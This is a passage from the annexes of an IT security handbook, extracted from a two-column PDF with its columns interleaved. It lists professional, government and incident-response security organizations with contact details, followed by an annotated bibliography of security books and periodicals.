throughout the (HTCIA) U.S. and around the world. FOUR The HTCIA is a professional organization for individuals For more information about ISSA, contact: involved with the investigation and prosecution of high- ISACA Headquarters technology crime, including computer crime. There are 3701 Algonquin Road, Suite 1010 chapters throughout the U.S., and in many other Rolling Meadows, Illinois 60008, USA countries. Information is available via the WWW page or +1-847-253-1545 through regular mail or phone: +1-847-253-1443 http://htcia.org ISACA has a WWW page at: HTCIA, Inc. http://www.isaca.org 1474 Freeman Dr. Amissville, VA 20106 +1 540-937-5019 380 ORGANIZATIONS International Information Systems Security 4, rue des Falaises Certification Consortium, Inc. CH-1205 Geneva Switzerland The (ISC)2 is an international organization that +41-22-807-1444 supervises the CISSP and SSCP professional Email: info@isoc.org certifications. The Certified Information Systems Security Professional and Systems Security Certified IEEE Computer Society Practitioner designations are widely accepted as standard levels of certification of those working in security. The With nearly 100,000 members, the Computer Society is organization requires certificants to subscribe to a the largest member society of the Institute of Electrical professional code of conduct and to undergo continuing and Electronics Engineers (IEEE). It too is involved with education after passing the initial tests. scholarly publications, conferences and workshops, professional education, technical standards, and other More information can be found on the WWW site or via mail. activities designed to promote the theory and practice http://www.isc2.org of computer science and engineering. The IEEE­CS also has special interest groups, including a Technical (ISC)2 Services Committee on Security and Privacy, a Technical P.O. Box 1117 Committee on Operating Systems, and a Technical Dunedin, FL 34697 Committee on Software Engineering. More information USA on the Computer Society may be obtained from: +1.888.333.4458 IEEE Computer Society (ISC)2 Europe Operations 1730 Massachusetts Avenue N.W. Nestor House Washington, DC 20036-1992 London UK EC4V 5EX +1-202-371-0101 + 44 (0) 20 7779 8030 The Computer Society has a set of WWW pages starting at: (ISC)2 Asia Operations http://www.computer.org 17/F., Printing House Central Hong Kong The Computer Society's Technical Committee on Security +852 2111 6612 and Privacy has a number of resources, including an online newsletter: The Internet Society http://www.ieee-security.org/ The Internet Society sponsors many activities and IFIP Technical Committee 11 events related to the Internet, including an annual symposium on network security. For more information, The International Federation for Information Processing, contact the Internet Society: Technical Committee 11, is devoted to research, http://www.isoc.org education, and communication about information systems security. The working groups of the committee You may also contact the Society's US or European sponsor various activities, including conferences, headquarters: throughout the world. More information may be obtained from: 1775 Wiehle Ave., Suite 102 http://www.ifip.org Reston, VA 20190-5108 (Follow the links for security or for TC 11.) +1-703-326-9880 Information Technology Security Handbook ORGANIZATIONS 381 Systems Administration and Network Security (SANS) U. S. Government Organizations SANS conducts workshops and conferences around the National Institute of Standards and Technology U.S. to provide continuing education in various aspects (NIST) of system administration and security. This includes training in intrusion detection, firewalls, and general The National Institute of Standards and Technology security. The organization also provides various on-line (formerly the National Bureau of Standards) has been newsletters and alerts, plus some self-paced instruction. charged with the development of computer security More information can be found on their WWW site. standards and evaluation methods for applications not http://www.sans.org involving the Department of Defense (DoD). Its efforts include research as well as developing standards. USENIX/SAGE More information on NIST's activities can be obtained by The USENIX Association is a nonprofit education contacting: organization for users of UNIX and UNIX-like systems. The Association publishes a magazine, sponsors NIST Computer Security Division numerous conferences, and has representatives on 100 Bureau Drive international standards bodies. The Association sponsors Mail Stop 8930 an annual workshop on UNIX security and another on Gaithersburg, MD 20899-8930 systems administration, plus many conferences with +1-301- 975-2934 security-related information. http://www.nist.gov SAGE stands for the Systems Administrators Guild. It is a NIST operates the Computer Security Resource Center: special technical group of the USENIX Association. To http://csrc.nist.gov/ join SAGE, you must also be a member of USENIX. Information on USENIX and SAGE can be obtained from: National Security Agency (NSA) USENIX Association The NSA maintains lists of evaluated and certified 2560 Ninth Street products, as well as technical information about Suite 215 security, especially cryptography. Linux users may be Berkeley, CA 94710 interested in the NSA Secure Linux program, a set of +1-510-528-8649 kernel patches that enhances Linux security. NSA also ANNEX office@usenix.org operates the National Cryptologic Museum in Maryland, and has an online museum of cryptology. The NSA web The USENIX WWW page is at: site is http://www.nsa.gov. FOUR http://www.usenix.org Also available from the site are a number of helpful configuration guides for common operating systems and routers. These guides provide helpful tips on changing default configurations to support better security and control. 382 ORGANIZATIONS Emergency Response Organizations U.S. Secret Service (USSS) The Department of Justice, FBI, and U.S. Secret Service Financial Crimes Division organizations listed below investigate violations of the Electronic Crime Branch federal laws related to fraud, theft, and the misuse of U.S. Secret Service computer resources. The various response teams that Washington, DC 20223 comprise the Forum of Incident and Response Security Voice: +1-202-435-7700 Teams (FIRST) do not investigate computer crimes per http://www.ustreas.gov/usss/financial_crimes.shtml se, but provide assistance when security incidents occur; they also provide research, information, and support that Forum of Incident and Response Security Teams can often help those incidents from occurring or spreading. (FIRST) Note that Federal agencies often have field (local) The Forum of Incident and Response Security Teams offices where you can get more personal contact, (FIRST) was established in March 1993. FIRST is a although not all field offices are staffed by personnel coalition that brings together a variety of computer with the same level of training as those at headquarters security incident-response teams from the public and offices. You can check your phone directory for local private sectors, as well as from universities. FIRST's numbers: look under "US Government." constituents comprise many response teams throughout the world. FIRST's goals are to: Department of Justice (DOJ) · Boost cooperation among information technology users in the effective prevention of, detection of, and 10th & Constitution Ave., NW recovery from computer security incidents Criminal Division, (Computer Crime & Intellectual · Provide a means to alert and advise clients on Property Section) potential threats and emerging incident situations John C. Keeney Building, Suite 600 · Support and promote the actions and activities of Washington, DC 20530 participating incident response teams, including +1-202-514-1026 research and operational activities http://www.cybercrime.gov · Simplify and encourage the sharing of security-related information, tools, and techniques Federal Bureau of Investigation (FBI) FIRST sponsors an annual workshop on incident response In addition to the NIPC, the FBI also runs the that includes tutorials and presentations by members of Infraguard -- a set of regional cooperative efforts response teams and law enforcement. uniting the FBI and local businesses to protect against computer crime. The Infraguard links may be found on FIRST incorporated in mid-1995 as a nonprofit entity, the NIPC WWW pages. and migrated FIRST Secretariat duties away from NIST. National Infrastructure Protection Center The Secretariat can be reached at: J. Edgar Hoover Building FIRST Secretariat 935 Pennsylvania Avenue, NW First.Org, Inc. Washington, D.C. 20535-0001 PMB 349 +1-202-323-3205 650 Castro Street, Suite 120 http://www.nipc.gov Mountain View, CA 94041 Email: first-sec@first.org http://www.first.org/ FIRST consists of a large number of member organizations. Check online for the most up-to-date list Information Technology Security Handbook ORGANIZATIONS 383 of members. If you have a security problem or need assistance, first attempt to determine which of these organizations most clearly covers your operations and needs. If you are unable to determine which (if any) FIRST group to approach, call any of them for a referral to the most appropriate team. Most of these response teams have a PGP key with which they sign their advisories or enable constituents to report problems in confidence: http://www.first.org/rep-info/ Most teams have arrangements to monitor their phones 24 hours a day, 7 days a week. Computer Emergency Response Team Coordination Center (CERT/CC) One particularly notable FIRST team is the CERT® Coordination Center, which serves all Internet sites. CERT grew from the computer emergency response team formed by the Advanced Research Projects Agency (ARPA) in November 1988 (in the wake of the Internet Worm and similar incidents). The CERT/CC charter is to work with the Internet community to facilitate its response to computer security events involving Internet hosts, to take proactive steps to raise the community's awareness of computer security issues, and to conduct research into improving the security of existing systems. Their WWW archive (http://www.cert.org) contains an ANNEX extensive collection of alerts about past (and current) security problems. Contact CERT at: FOUR CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 +1-412-268-7090 (24 hour hotline) Email: cert@cert.org 384 PRINT RESOURCES ANNEX 5. Windows Security References PRINT RESOURCES Norberg, Stefan. Securing Windows NT/2000 Servers for There have been a great many books, magazines and the Internet: A Checklist for System Administrators. papers published on security in the last few years, Cambridge, MA: O'Reilly and Associates, 2002. An reflecting the growing concern with the topic. Trying to excellent hardening guide for Windows NT-based systems keep up with even a subset of this information can be that will be used to provide Internet services. quite a chore, whether you wish to stay current as a researcher or as a practitioner. Here, we have collected Anderson-Redick, Stacey. Windows System Policy Editor. information about several useful references that you can Sebastopol, CA: O'Reilly and Associates, 2000. use as a starting point for more information, further depth, and additional assistance. Other Security References We have tried to confine the list to a small set of The following books and articles are of general interest accessible and especially valuable references that you to all practitioners of computer security. will not have difficulty finding. A few of the references we have left in for historical reference as much as for Computer Crime and Law any other reason. We've provided annotation where we think it will be helpful. Freedman, David H., and Charles C. Mann. @Large; NYC, NY, 1997. A story about a huge computer crime spree If you are interested in building your security bookshelf, caused entirely by two people. This incident spawned we advise you to visit a bookstore, see the booksellers the FBI Computer Crime Squad, some FIRST teams, and at a security conference, or read the reviews of books in the writing of the Tripwire tool at Purdue. security-related venues. The field is moving quickly. Just as you keep up with bugs and patches, it is important Icove, David, Karl Seger, and William VonStorch, to maintain your currency with the literature! Computer Crime: A Crimefighter's Handbook, Sebastopol, CA: O'Reilly & Associates, 1995. A popular rewrite of an UNIX Security References FBI training manual; dated, but with some worthy material. These books focus on UNIX computer security. Power, Richard. Tangled Web. Indianapolis, IN, Que, Garfinkel, Simson, Gene Spafford, and Alan Schwartz. 2002. A collection of stories of cybercrime and Practical Unix and Internet Security, 3rd Edition. investigation. Cites a number of statistics to give a Cambridge, MA: O'Reilly and Associates, Inc., 2003. snapshot of the problem. Grampp, F. T., and R. H. Morris. "UNIX Operating System Computer-Related Risks Security," AT&T Bell Laboratories Technical Journal, October 1984. This is the original article on UNIX Leveson, Nancy G. Safeware: System Safety and security and remains worth reading. Computers. A Guide to Preventing Accidents and Losses Caused by Technology. Reading, MA: Addison Wesley, Wood, Patrick H., and Stephen G. Kochan. UNIX System 1995. This textbook contains a comprehensive Security, Carmel, IN: Hayden Books, 1986. A good exploration of the dangers of computer systems, and treatment of UNIX System V security prior to the explores ways in which software can be made more fault incorporation of TCP/IP networking. This book is of tolerant and safety conscious. mainly historical interest. Information Technology Security Handbook PRINT RESOURCES 385 Neumann, Peter G. Computer Related Risks. Reading, MA: Hinsley, F.H., and Alan Stripp. Code Breakers: The Inside Addison & Wesley, 1995. Dr. Neumann moderates the Story of Bletchley Park. Oxford, England: Oxford Internet RISKS mailing list. This book is a collection of University Press, 1993. the most important stories passed over the mailing list since its creation. Hoffman, Lance J. Building in Big Brother: The Cryptographic Policy Debate. New York, NY: Springer- Computer Viruses and Programmed Threats Verlag, 1995. An interesting collection of papers and articles about the Clipper Chip, Digital Telephony Communications of the ACM, Volume 32, Number 6, June legislation, and public policy on encryption. Of some 1989 (the entire issue). This whole issue was devoted to historical interest. issues surrounding the Internet Worm incident. Kahn, David. The Codebreakers. New York, NY: Macmillan Ferbrache, David. The Pathology of Computer Viruses. Company, 1972. The definitive history of cryptography London, England: Springer- Verlag, 1992. This was prior to the invention of public key. probably the best all-around book on the technical aspects of computer viruses, although it doesn't cover Schneier, Bruce. Applied Cryptography: Protocols, macro viruses. Algorithms, and Source Code in C. Second edition. New York, NY: John Wiley & Sons, 1996. The most Denning, Peter J. Computers Under Attack: Intruders, comprehensive, unclassified book about computer Worms and Viruses. Reading, MA: ACM Press/Addison- encryption and data-privacy techniques ever published. Wesley, 1990. A comprehensive collection of readings related to these topics, including reprints of many Singh, Simon. The Code Book: The Science of Secrecy classic articles. Historical interest. from Ancient Egypt to Quantum Cryptography. NY: Anchor Books, 2000. A very readable and up-to-date treatment Hoffman, Lance J., Rogue Programs: Viruses, Worms and of the history and principles of cryptography. Trojan Horses. New York, NY: Van Nostrand Reinhold, 1990. A comprehensive collection of readings on Wayner, Peter. Disappearing Cryptography; Boston, MA: viruses, worms, and the like. More historical interest. Academic Press, 1996. Good coverage of steganography. The Virus Bulletin. Virus Bulletin CTD. Oxon, England. An Cryptography Papers and Other Publications international publication on computer virus prevention and removal. This is an outstanding publication about Association for Computing Machinery. "Codes, Keys, and computer viruses and virus prevention. It is likely to be Conflicts: Issues in U.S. Crypto Policy." Report of a of value only to sites with a significant PC population, Special Panel of the ACM U.S. Public Policy Committee however. The publication also sponsors conferences that location: USACM, June 1994. (URL: http://info.acm.org/ have good papers on viruses. http://www.virusbtn.com. reports/acm_crypto_study. html) Cryptography Books Diffie, Whitfield. "The First Ten Years of Public-Key Cryptography." Proceedings of the IEEE 76 (1988): Denning, Dorothy E. R. Cryptography and Data Security. 560­76. Whitfield Diffie's tour-de-force history of public Reading, MA: Addison-Wesley, 1983. The classic textbook key cryptography, with revealing commentaries. ANNEX in the field. Now out of print but worth having. Diffie, Whitfield, and M.E. Hellman. "New Directions in Garfinkel, Simson. PGP: Pretty Good Privacy. Sebastopol, Cryptography." IEEE Transactions on Information Theory FIVE CA: O'Reilly & Associates, 1994. Describes the history of IT-22 (1976). The article that introduced the concept of cryptography, the history of the program PGP, and public key cryptography explains the PGP's use. 386 PRINT RESOURCES Lai, Xuejia. "On the Design and Security of Block Computers & Security. This is a journal published eight Ciphers." ETH Series in Information Processing 1 (1992). times each year by Elsevier Press, Oxford, England. The article describing the IDEA cipher. (Order from Elsevier Press, +44-(0) 865-512242.) It is one of the main journals in the field. This journal is LaMacchia, Brian A. and Andrew M. Odlyzko. priced for institutional subscriptions, not individuals. "Computation of Discrete Logarithms in Prime Fields." Each issue contains pointers to dozens of other Designs, Codes, and Cryptography. (1991):, 46­62. publications and organizations that might be of interest, as well as referenced articles, practicums, and Lenstra, A.K., H. W. Lenstra, Jr., M.S. Manasse, and J.M. correspondence. The URL for the WWW page is included Pollard. "The Number Field Sieve." Proceedings of the in "Security Periodicals." 22nd ACM Symposium on the Theory of Computing. Baltimore MD: ACM Press, 1990, 564­72. Gasser, Morrie. Building a Secure Computer System. New York, NY: Van Nostrand Reinhold, 1988. A solid Merkle, Ralph. "Secure Communication Over Insecure introduction to issues of secure system design. Most of Channels." Communications of the ACM 21 (1978): the principles still aren't followed in modern systems 294­99 (submitted in 1975). The article that should (unfortunately). have introduced the concept of public key cryptography. Gollmann, Dieter. Computer Security; Chichester, UK, Merkle, Ralph, and Martin E. Hellman. "On the Security John Wiley & Sons, 1999. A good survey textbook, of Multiple Encryption." Communications of the ACM 24 widely used in academic settings. (1981): 465­67. Hunt, A. E., S. Bosworth, and D. B. Hoyt, eds. Computer Merkle, Ralph, and Martin E. Hellman. "Hiding Security Handbook, 3rd edition. New York, NY: Wiley, Information and Signatures in Trap Door Knapsacks." 1995. A massive and thorough collection of essays on IEEE Transactions on Information Theory 24 (1978): all aspects of computer security. 525­30. Pfleeger, Charles P and Shari Lawrence Pfleeger. Security Rivest, Ron, A. Shamir, and L. Adleman. "A Method for in Computing. Englewood Cliffs, NJ: Prentice-Hall, 3rd Obtaining Digital Signatures and Public Key edition, 2002. Another good introduction to computer Cryptosystems." Communications of the ACM 21 (1978). security. General Computer Security Russell, Deborah, and G. T. Gangemi, Sr. Computer Security Basics. Sebastopol, CA: O'Reilly & Associates, Amoroso, Edward. Fundamentals of Computer Security 1991. An excellent introduction to many areas of Technology. Englewood Cliffs, NJ: Prentice-Hall, 1994. A computer security and a summary of government very readable and complete introduction to computer security requirements and issues. security at the level of a college text. Schneier, B. Secrets and Lies: Digital Security in a Anderson, Ross. Security Engineering; NYC, NY: John Networked World. New York: John Wiley & Sons, 2000. Wiley & Sons, 2001. A comprehensive book on end-to- end system design with security in mind. Thompson, Ken. "Reflections on Trusting Trust" Communications of the ACM, Volume 27, Number 8, Bace, Rebecca. Intrusion Detection; Indianapolis, IN: August (1984). This is a "must-read" for anyone seeking Macmillan, 2000. An excellent book on the history and to understand the limits of computer security and trust. structure of intrusion detection systems for hosts and networks. Information Technology Security Handbook PRINT RESOURCES 387 Viega, John and Gary McGraw. Building Secure Software; Kaufman, Charles, Radia Perlman, and Mike Speciner. Indianapolis, IN: Pearson/ Addison-Wesley, 2002. An Network Security: Private Communications in a Public excellent book about how to code secure software, and World. Englewood Cliffs, NJ: Prentice-Hall, 2nd edition, the pitfalls of haphazard coding and deployment. 2002. Wood, Charles Cresson, et al. Computer Security: A Stallings, William. Cryptography and Network Security: Comprehensive Controls Checklist, New York, NY: John Principles and Practices. Englewood Cliffs, NJ: Prentice Wiley & Sons, 1987. Contains many comprehensive and Hall, 2003. A good introductory textbook. detailed checklists for assessing the state of your own computer security and operations. Out of print, but a Security Products and Services Information valuable reference if you can find one used. Computer Security Buyer's Guide. Computer Security Network Technology and Security Institute, San Francisco, CA. (Order from CSI, 415-905- 2626.) Contains a comprehensive list of computer Cheswick, Bill, Steve Bellovin, and Aviel Rubin. Firewalls security hardware devices and software systems that are and Internet Security: Repelling the Wily Hacker, Second commercially available. The guide is free with Edition. Reading, MA: Addison-Wesley, 2003. The second membership in the Institute. The URL is at edition of the classic book on firewalls. This book will http://www.gocsi.com. teach you almost everything you need to know about how firewalls work. The first edition text is largely Understanding the Computer Security available online for free, as well, at "Culture" http://www.wilyhacker.com/1e/. All of these describe views of the future and computer Chapman, D. Brent, and Elizabeth D. Zwicky. Building networks that are much discussed (and emulated) by Internet Firewalls. Sebastopol, CA: O'Reilly & Associates, system crackers. 2nd edition, 2000. A great how-to book that describes in clear detail how to build your own firewall. Brunner, John. Shockwave Rider. New York, NY: A Del Ray Book, published by Ballantine, 1975. One of the first Comer, Douglas E. Internetworking with TCP/IP. 3rd descriptions of a computer worm. Edition. Englewood Cliffs, NJ: Prentice Hall, 4th edition, 2000. A complete, readable reference that describes how Dreyfus, Suelette. Underground; Australia, Reed Books, TCP/IP networking works, including information on 1997. A book about the exploits of several Australian protocols, tuning, and applications. hackers relatively early on. Some of the story is incorrect, however, as the author failed to contact all Garfinkel, Simson. Web Security, Privacy, and Commerce, parties to verify the facts. 2nd Edition. Cambridge, MA: O'Reilly and Associates, Inc. 2002. Gibson, William. Burning Chrome, Neuromancer, Count Zero, Mona Lisa Overdrive, Virtual Light, Idoru, All Garman, Jason. Kerberos ­ The Definitive Guide. Tomorrow's Parties. New York, NY: Bantam Books Cyber- Cambridge, MA: O'Reilly and Associates, Inc, 2003. punk books by the science fiction author who coined Provides full coverage of Kerberos in Windows 2000 and the term "cyberspace." ANNEX Unix environments. Hafner, Katie and John Markoff, Cyberpunk: Outlaws and Hunt, Craig. TCP/IP Network Administration. Sebastopol, Hackers on the Computer Frontier. New York, NY: Simon FIVE CA: O'Reilly & Associates, 3rd edition, 2002. This book and Schuster, 1991. Tells the stories of three hackers-- is an excellent system administrator's overview of Kevin Mitrick, Pengo, and Robert T. Morris. TCP/IP networking (with a focus on UNIX systems), and a very useful reference to major UNIX networking Levy, Steven. Hackers: Heroes of the Computer services and tools such as BIND and send-mail. Revolution. New York, NY: Dell Books, 1984. One of the original publications describing the "hacker ethic." 388 PRINT RESOURCES Littman, Jonathan, The Fugitive Game: Online with Kevin UNIX System Administration Mitnick. Boston, MA: Little, Brown, 1996. A year prior to his capture in 1995, Jonathan Littman had extensive Albitz, Paul and Cricket Liu. DNS and BIND. Sebastopol, telephone conversations with Kevin Mitnick and learned CA: O'Reilly & Associates, 4th edition, 2001. An what it is like to be a computer hacker on the run. This excellent reference for setting up DNS nameservers. is the story. Bolsky, Morris I., and David G. Korn. The New Kornshell Shimomura, Tsutomu, with John Markoff. Takedown: The Command and Programming Language. Englewood Cliffs, Pursuit and Capture of Kevin Mitnick, America's Most NJ: Prentice-Hall, 2nd edition, 1995. This is a complete Wanted Computer Outlaw--By the Man Who Did It. New tutorial and reference to the ksh--the only shell some York, NY: Hyperion, 1995. On Christmas Day, 1994, an of us use when given the choice, and the inspiration for attacker broke into Tsutomu Shimomura's computer. A the POSIX shell standard used by bash and others. few weeks later, Shimomura was asked to help out with a series of break-ins at two major Internet service Kernighan, Brian, Dennis Ritchie and Rob Pike. The UNIX providers in the San Fransisco area. Eventually, the trail Programming Environment. Englewood Cliffs, NJ: led to North Carolina, where Shimomura participated in Prentice-Hall, 1984. A nice guide to the UNIX the tracking and capture of Kevin Mitnick. This is the philosophy and how to build shell scripts and command story, written by Shimomura and Markoff. Markoff is the environments under UNIX. journalist with The New York Times who covered the capture. Nemeth, Evi, Garth Snyder, Scott Seebass, and Trent R. Hein. UNIX System Administration Handbook. 3rd Edition. Sterling, Bruce. The Hacker Crackdown: Law and Disorder Englewood Cliffs, NJ: Prentice-Hall, 2000. An excellent on the Electronic Frontier. This book is available in reference on the various ins and outs of running a UNIX several places on the WWW; http://www-swiss.ai. system. This book includes information on system mit.edu/~bal/ sterling/contents.html is one location; configuration, adding and deleting users, running other locations can be found in the COAST hot-list. accounting, performing backups, configuring networks, running sendmail, and much more. Highly recommended. Stoll, Cliff. The Cuckoo's Egg, Garden City, NY: Doubleday, 1989. An amusing and gripping account of tracing a Welsh, Matt, Kaufman, Lar, Dalheimer, Matthias K., and computer intruder through the networks. The intruder Dawson, Terry. Running Linux (4th edition). Sebastopol, was later found to be working for the KGB and trying to CA: O'Reilly & Associates, 2002. steal sensitive information from U. S. systems. Wall, Larry, Christiansen, Tom, and Orwant, Jon. Varley, John. "Press" Enter. Reprinted in several Programming perl (3rd edition), Sebastopol, CA: O'Reilly collections of science fiction, including Blue & Associates, 2000. The definitive reference to the Perl Champagne, Ace Books, 1986; Isaac Asimov's Science scripting language. A must for anyone who does much Fiction Magazine, 1984; and Tor SF Doubles, October, Tor shell, awk, or sed programming or would like to quickly Books, 1990. write some applications in UNIX. Vinge, Vernor. True Names and Other Dangers. New York, NY: Baen, distributed by Simon & Schuster, 1987. Information Technology Security Handbook PRINT RESOURCES 389 Windows System Administration Disaster Recovery Journal O'Reilly and Associates has a series of helpful books on PO Box 510110 Windows system administration, including Windows NT St. Louis, MO 63151 TCP/IP Network Administration (Craig Hunt and Robert +1 314-894-0276 Bruce Thompson, 1998), Managing the Windows 2000 Registry (Robichaux, 2000), DHCP for Windows 2000 http://www.drj.com (Neall Alcott, 2001), DNS on Windows 2000, 2nd Edition (Matt Larson and Cricket Liu, 2001), Windows 2000 InfoSecurity News Administration in a Nutshell (Mitch Tulloch, 2001), and Windows Server 2003 in a Nutshell (Mitch Tulloch, 2003). West Coast Publishing, Inc. 161 Worcester Road, Suite 201 Security Periodicals Framingham, MA 01701 Computer Audit Update http://www.scmagazine.com Computer Fraud & Security Update Computer Law & Security Report Information Security Computers & Security 85 Astor Ave, Suite 2 Elsevier Advanced Technology Norwood, MA 02062 Crown House, Linton Rd. Barking, Essex I611 8JU http://www.infosecuritymag.com England Voice: +44-81-5945942 Fax: +44-81-5945942 Telex: 896950 APPSCI G North American Distributor: P.O. Box 882 New York, NY 10159 Voice: +1-212-989-5800 http://www.elsevier.nl/catalogue/ Computer Security Alert Computer Security Journal Computer Security Buyers Guide Computer Security Institute 600 Harrison Street San Francisco, CA 94107 ANNEX Voice: +1-415-905-2626 http://www.gocsi.com FIVE